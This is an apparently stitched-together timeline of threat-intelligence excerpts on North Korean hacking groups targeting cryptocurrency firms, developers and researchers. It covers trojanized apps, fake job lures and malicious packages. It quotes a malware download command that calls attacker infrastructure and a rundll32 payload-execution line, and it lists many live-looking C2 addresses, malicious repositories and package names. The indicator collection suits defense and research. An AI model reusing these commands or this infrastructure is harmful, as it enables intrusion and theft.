In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.
Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium[.]org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32. This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat.
Actor-controlled Twitter Handles
FBI + CISA: Report on Operation AppleJeus - Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale
Date:: 2021-02-17
targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency
the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate
infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
Celas Trade Pro JMT Trading Union Crypto Kupay Wallet CoinGoTrade Dorusio Ants2Whale
Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
The United State Justice Department said Hushpupp conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
“The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.
The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks
In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.
HushPuppi - The Fall Of The Billionaire Gucci Master
Date:: 2021-06-30
Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online.
CVE-2022-1096 reported by anon - type confusion V8
Date:: 2022-03-23
FireEye/Mandriant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations
Date:: 2022-03-23
CVE-2022-0609 Google posts update abt zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus
Date:: 2022-03-24
Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (1️⃣ CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
CVE-2022-1096 Chrome Update Released - type confusion V8
Date:: 2022-03-25
Lazarus Trojanized DeFi app for delivering malware
Date:: 2022-03-31
We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet,
APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users
Date:: 2022-04-12
In this attack, Lazarus built a type of decoy document containing an “AhnLab ” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.
CVE-2022-1364 Reported by Google TAG's Clément Lecigne
Date:: 2022-04-13
Type Confusion, V8 Engine
CVE-2022-1364 Chrome Update Released, everyone told to update urgently
Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.
Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD
Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration
In June 2022, the Lazarus Group registered the domain name bloxholder[.]com, and then configured it to host a website related to automated cryptocurrency trading.
AppleJeus C2:: strainservice[.]com
AppleJeus C2:: bloxholder[.]com
AppleJeus C2:: rebelthumb[.]net
AppleJeus C2:: wirexpro[.]com
AppleJeus C2:: oilycargo[.]com
AppleJeus C2:: telloo[.]io
Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
Kimsuky - North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy
Date:: 2023-01-12
Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method).
Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers; in this case, the threat actor used an image that prompts users to execute the macro.
The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
Jamf - BlueNoroff APT group targets macOS with ‘RustBucket’ Malware
Date:: 2023-04-21
Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2 servers to download and execute various payloads. This attribution is due to the similarities noted in a Kaspersky blog
North Korea is now Mining Crypto to Launder Its Stolen Loot
Date:: 2023-05-23
Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine pages document about a venture capital company that appears to be the printout of a legit company’s website. The fake PDF reader uses a hardcoded 100-bytes XOR key to decrypt the new content of the document and the C2 server configuration.
During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.
Bluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me, further analysis led us to the following LinkedIn profile:
RustBucket MacOS version - 2023-05-08 - Jump Crypto Investment Agreement
Key PDF file 2 - PDF - DOJ Report on Bizlato Investigation_asistant.pdf 07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06
safe.doc-share[.]cloud
IPs and Domains:
104.156.149[.]130 (2023-04-18)
104.255.172.52 (2023-03-18)
104.234.147[.]28 (2023-01-21)
104.168.138.7 (2023-03-17)
104.168.167[.]88 (2022-10-17)
155.138.159.45 (2022-09-20)
104.255.172[.]56 (2022-09-15 - 2023-04-11)
172.93.181[.]221 (2022-12-28 - 2023-03-06)
172.86.121[.]143 (2022-10-31 - 2022-12-21)
172.86.121[.]130 (2022-10-25 - 2023-01-24)
149.28.247[.]34 (2022-11-11 - 2022-11-11)
152.89.247[.]87 (2022-09-15 - 2022-10-24)
104.168.174[.]80 (2022-06-28 - 2022-09-16)
149.248.52[.]31 (2022-08-05 - 2022-08-31)
155.138.219[.]140 (2022-07-17 - 2022-08-16)
Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
Date:: 2023-06-06
Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
Two of the three isolated samples are generic backdoors written in Python that seem to target Mac OS, Windows and Linux-based operating systems.
www.git-hub[.]me/view.php
Andariel’s silly mistakes and a new malware family
In the intrusions seen to date, researchers identified two Python backdoors, shared.dat and sh.py. The former uses a simple rot13 string obfuscation technique.
The sh.py backdoor is also multi-platform and requires a separate configuration file stored at ~/Public/Safari/sar.dat, likely containing the C2 as well as other parameters. The C2 observed by Elastic in an attack on an unnamed Japanese cryptocurrency exchange was app.influmarket[.]org.
An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.
sh.py is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt .
app.influmarket[.]org
How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection
do shell script "curl -o \"/users/shared/Potential Risks of Cryptocurrency Assets.pdf\" https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent"
104.168.167[.]88
C2:: crypto.hondchain[.]com
C2:: starbucls[.]xyz
C2:: jaicvc[.]com
C2:: docsend.linkpc[.]net (dynamic DNS domain)
GitHub Security Alert: Social engineering campaign targets technology industry employees
At the end of May 2023, JPCERT/CC confirmed an attack targeting developers of cryptocurrency exchange businesses, and it is considered to be related to the targeted attack group DangerousPassword [1], [2] (a.k.a. CryptoMimic or SnatchCrypto), which has been continuously attacking since June 2019. This attack targeted Windows, macOS, and Linux environments with Python and Node.js installed on the machine. This article explains the attack that JPCERT/CC has confirmed and the malware used.
Python malware is simple downloader-type malware that downloads and executes MSI files from an external source. As shown in Figure 2, it is characterized by its extensive use of ROT13 to obfuscate C2 strings and other strings used.
Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures
Date:: 2023-07-28
ScarCruft lured victims using U.S. military-related documents to run malware staged from legitimate compromised Republic of Korea websites. The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware
New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
When we decode the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine. The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host’s platform name, username and a random, 6 character-long string.
C2:: 45.61.139[.]219
C2:: ethertestnet[.]pro
C2:: deliworkshopexpress[.]xyz
FBI Identifies Cryptocurrency Funds Stolen by DPRK
Active North Korean campaign targeting security researchers
Date:: 2023-09-07
In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0- day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:
Lazarus Group’s Undercover Operations 2022–2023 - L. Taewoo, S. Lee & D. Kim
Since early October 2023, Microsoft has observed two North Korean nation-state threat actors – Diamond Sleet and Onyx Sleet – exploiting CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server. TeamCity is a continuous integration/continuous deployment (CI/CD) application used by organizations for DevOps and other software development activities.
Lazarus’ New Campaign Exploiting Legitimate Software
This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.
FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application
Date:: 2023-10-30
Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them
Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.
Operation Dream Magic, MagicLine4NX - Hackers use zero-day in supply-chain attack
North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.
Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:
Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.
In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.
SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.
A number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.
There are Extension ID's hardcoded in there that are related to crypto wallets and the JavaScript attempts to decrypt/collect that data and send it off to the server of IP 147.124.212[.]89:1244 using different endpoints
Blockchain dev's wallet emptied in "job interview" using npm package
The Upwork job posting asks the applicant to "fix bugs and resopnsiveness [sic] on website" and claims to pay between $15 and $20 hourly for a task expected to take under a month.
CVE-2024-21338 - North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw
Date:: 2024-02-24
The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions.
JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI.
This type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in an attack reported by Google [1] in January 2021. The following sections describe the details of test.py.
In addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is a command starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and encode functions. This characteristic is also found in other types of malware used by Lazarus, including malware BLINDINGCAN.
After test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file: $ rundll32 output.py,CalculateSum
pycryptoenv
pycryptoconf
quasarlib
swapmempool
blockchain-newtech[.]com/download/download.asp
fasttet[.]com/user/agency.asp
chaingrown[.]com/manage/manage.asp
91.206.178[.]125/upload/upload.asp
SquidSquad | Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram
According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.
Contagious Interview | SlowMist: Lazarus group appears to be currently reaching out to targets via LinkedIn and steal employee privileges or assets through malware
Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing.
Github:: plannet-plannet
Github:: bmstoreJ
Github:: CodePapaya
Github:: Allgoritex
Github:: bohinskamariia
Github:: danil33110
Github:: aluxiontemp
Github:: komeq1120
Github:: aufeine - Account active since 2024-04-15
Github:: dhayaprabhu - Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
Github:: MatheeshaMe - Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
Github:: Satyam-G5 - Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
Github:: emadmohd211 - Account active since 2021
Github:: alifarabi - Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
Bitbucket:: juandsuareza
Bitbucket:: freebling
C2:: 172.86.97[.]80:1224
C2:: 172.86.123[.]35:1244
C2:: 147.124.212[.]89:1244
C2:: 147.124.212[.]146:1244
C2:: 147.124.213[.]11:1244
C2:: 147.124.213[.]29:1244
C2:: 147.124.214[.]129:1244
C2:: 147.124.214[.]131:1244
C2:: 147.124.214[.]237:1244
C2:: 67.203.7[.]171:1244
C2:: 67.203.7[.]245:1244
C2:: 91.92.120[.]135:3000
C2:: 45.61.131[.]218:1245
C2:: 173.211.106[.]101:1245
Python Trojan, with C2 at 45.61.131[.]218:1245
Download a Python script for deploying AnyDesk from the URL "/adc/" of the first-stage C2 server (147.124.214[.]237:1244)
US court orders forfeiture of 279 crypto accounts tied to North Korea laundering
Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware.
While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.
Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.
Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.
In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022
Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.
Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:
Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.
From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.
bestonlinefilmstudio[.]org
blockchain-newtech[.]com
ccwaterfall[.]com
chaingrown[.]com
defitankzone[.]com
detankwar[.]com
freenet-zhilly[.]org
matrixane[.]com
pointdnt[.]com
starglowventures[.]com
mingeloem[.]com
From Opportunity to Threat: My Encounter with a Blockchain Job Scam
North Korean Government-Backed Groups Targeting Brazil
Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.
